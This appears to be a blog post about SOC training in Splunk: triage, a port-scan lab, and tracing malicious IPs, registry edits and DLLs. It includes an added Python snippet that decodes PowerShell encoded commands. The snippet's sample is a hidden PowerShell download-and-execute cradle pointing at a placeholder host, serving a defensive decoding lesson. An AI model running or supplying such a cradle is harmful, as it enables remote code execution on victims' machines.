We kept digging deeper into Splunk investigations, and for the first time, I came across an encrypted PowerShell command with clear malicious intent. The task? Find the URL that initiated a web request. It wasn’t easy; I struggled for a bit, but eventually I cracked it. That moment of “Yes, I found it!” felt great.
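The decoding step behind that task, as an added example in Python that is not part of the original post: an `-EncodedCommand` payload is Base64 over UTF-16LE text, so it has to be decoded as UTF-16LE (not UTF-8) before a URL can be pulled out. The command line below is a constructed sample, and the flag-matching and URL regexes are my own assumptions rather than anything from the post.

```python
import base64
import re
from typing import List, Optional

# Constructed sample of the kind of command line you would lift from a
# process-creation event in Splunk (e.g. the CommandLine field). The script
# inside is a harmless download stub pointing at a reserved .invalid domain.
PLAIN_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/payload.ps1')"
SAMPLE_COMMAND_LINE = (
    "powershell.exe -NoP -W Hidden -EncodedCommand "
    + base64.b64encode(PLAIN_COMMAND.encode("utf-16le")).decode("ascii")
)

# powershell.exe accepts abbreviated switches, so match the common short forms
# as whole words; the \b keeps "-e" from swallowing "-ExecutionPolicy".
ENC_FLAG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded script text, or None if no encoded-command switch is present."""
    match = ENC_FLAG_RE.search(command_line)
    if not match:
        return None
    b64 = match.group(1)
    # Logs sometimes drop trailing '=' padding; restore it before decoding.
    b64 += "=" * (-len(b64) % 4)
    raw = base64.b64decode(b64, validate=True)
    # PowerShell encodes the script as UTF-16LE. Decoding as UTF-8 instead
    # yields NUL-laced garbage, which is the usual stumbling block.
    return raw.decode("utf-16le")


def extract_urls(command_line: str) -> List[str]:
    """Decode the command line if needed and return the URLs it references."""
    decoded = decode_encoded_command(command_line)
    text = decoded if decoded is not None else command_line
    return sorted(set(URL_RE.findall(text)))


if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_COMMAND_LINE))
    print(extract_urls(SAMPLE_COMMAND_LINE))
```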

After a bit of theory, we dove into SOC fundamentals, starting with triage, which is essentially the process of prioritizing alerts based on their severity, urgency, and potential impact. It’s like digital first aid: not every alert needs immediate action, but some absolutely do.

We put that theory into action with a practical lab where we analyzed an alert related to port scanning. That part was pretty chill, a relatively calm morning overall.
But then the afternoon hit and things got real.

We started a new investigation that made me want to punch my computer. Our task was to identify two outbound connections to a known malicious IP address. Then, we had to track down a registry key change made during the attack. I was already boiling, but I pushed through.

Next, we needed to figure out which processes were killed by the binaries. That step took time, patience, and a lot of trial and error. Finding the right sourcetype and using simple keyword searches are absolutely key in Splunk. Another malicious binary popped up, and with it, another task: track down the DLLs loaded by that binary.
By the end of the day, my brain hurt, but in a good way. And for me? All this just confirmed it – I’m definitely aiming for the penetration tester path. Defensive work is cool, but I want to be on the other side.